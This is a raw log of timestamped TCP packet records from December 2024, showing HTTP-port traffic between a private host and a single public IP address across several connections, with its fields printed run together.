                                                                        Dec 28, 2024 20:43:03.809689999 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809722900 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809813023 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809859991 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809891939 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809900999 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809947968 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.820465088 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.820647955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.820739031 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.821700096 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.821708918 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.821712971 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.821762085 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.852607965 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.852617979 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.852626085 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.852634907 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.852701902 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.852814913 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.852833033 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.852885008 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.858544111 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.858555079 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.858613968 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.858689070 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.858733892 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.930918932 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.930932999 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.930939913 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.930943966 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.930954933 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.930988073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931021929 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.931062937 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.931070089 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931081057 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931118011 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931118965 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.931158066 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931212902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931247950 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931302071 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931310892 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931478977 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931561947 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931570053 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931586027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931665897 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931813955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931822062 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931826115 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931941986 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931951046 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.931960106 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932003975 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932099104 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932172060 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932280064 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932287931 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932389975 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932398081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932547092 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932554960 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932753086 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932760954 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932806015 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932813883 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932946920 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.932986975 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933048964 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933168888 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933177948 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933229923 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933238983 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933243036 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933279991 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933289051 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933296919 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933305025 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933381081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933389902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933402061 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.933410883 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.941740036 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.942981958 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.942991972 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.943073988 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.943780899 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.943789005 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.972455025 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.972465992 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.972616911 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.972626925 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.972709894 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.972721100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.978148937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.978224993 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.978234053 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.978326082 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.978334904 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050340891 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050348997 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050393105 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050396919 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050460100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050470114 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050580978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050589085 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050681114 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050689936 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050734043 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050780058 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050827980 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050836086 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050873041 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.050882101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051063061 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051070929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051078081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051088095 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051095963 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051104069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051171064 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051179886 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051188946 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051198006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051296949 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051305056 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051309109 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051321983 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051330090 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051419973 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051472902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051529884 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051538944 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051614046 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051624060 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051682949 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051696062 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051742077 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051750898 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051800966 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051883936 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051892996 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051901102 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051913977 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.051965952 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.052010059 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.052020073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.052067041 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.052074909 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.361829042 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.500996113 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:04.608669996 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:04.735275030 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:04.736440897 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.110379934 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.117187977 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.117682934 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.409811020 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.409888029 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.410176992 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.410290003 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.410341978 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.411084890 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.532040119 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.567037106 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.567343950 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.686995029 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.766735077 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:05.889121056 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.889132023 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.889158964 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.899681091 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:05.899828911 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.019500971 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.019686937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.438407898 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.439766884 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.497085094 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.559433937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.618766069 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.741935015 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.773401022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.777132988 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.785216093 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.886531115 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.890177965 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:06.896770954 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:06.896811008 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.006392002 CET8049756104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.009846926 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.010158062 CET4975680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.010247946 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.010354996 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.129734993 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.302690029 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.303625107 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.360524893 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.423070908 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.480144978 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.480163097 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.480231047 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.635962963 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.636301994 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.756051064 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.756062984 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.142354012 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.159806013 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.160877943 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.280448914 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.313497066 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.384448051 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.493146896 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.495301008 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.501010895 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.510108948 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.510766029 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.614898920 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.615077019 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.630970955 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.631091118 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.631138086 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.631288052 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.631288052 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.750787973 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.985441923 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.016171932 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.017096996 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.105266094 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.105277061 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.105288029 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.137223959 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.350409031 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.350716114 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.470159054 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.470346928 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.716850042 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.882715940 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.886603117 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.891638041 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.955317020 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.000993967 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.007323027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.078381062 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.079150915 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.198184967 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.198291063 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.198635101 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.198755980 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.198853970 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.220232010 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.220375061 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.318754911 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.340245008 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.340265036 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.548271894 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.668926001 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.668936014 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.668943882 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.753132105 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.755019903 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.874526978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.087271929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.087455988 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.206985950 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.207194090 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.283055067 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.501024961 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.534069061 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.610384941 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.613184929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.614779949 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.656495094 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.657423973 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.734565020 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.776400089 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.776494026 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.777019024 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.777132034 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.777249098 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.896682024 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.948090076 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.948314905 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:12.067955017 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.068192005 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.126060009 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:12.245640993 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.245663881 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.245678902 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.478688955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.479485989 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:12.599004984 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.812088013 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.812278986 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:12.933439970 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.933478117 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.953546047 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.016625881 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.241085052 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.302097082 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.310853958 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.313505888 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.357501030 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.395900011 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.430316925 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.477435112 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.477488995 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.515353918 CET8049781104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.515419006 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.515544891 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.635091066 CET8049781104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.643158913 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.643306971 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.763381004 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.763520956 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.860470057 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.980035067 CET8049781104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.980062008 CET8049781104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.980112076 CET8049781104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:14.643465042 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:14.644414902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:14.644484997 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:14.646616936 CET8049781104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:14.651783943 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:14.690927982 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:14.772644043 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:14.887959003 CET8049781104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:14.938607931 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:14.983839035 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:14.989118099 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:15.108680964 CET8049734104.21.38.84192.168.2.4
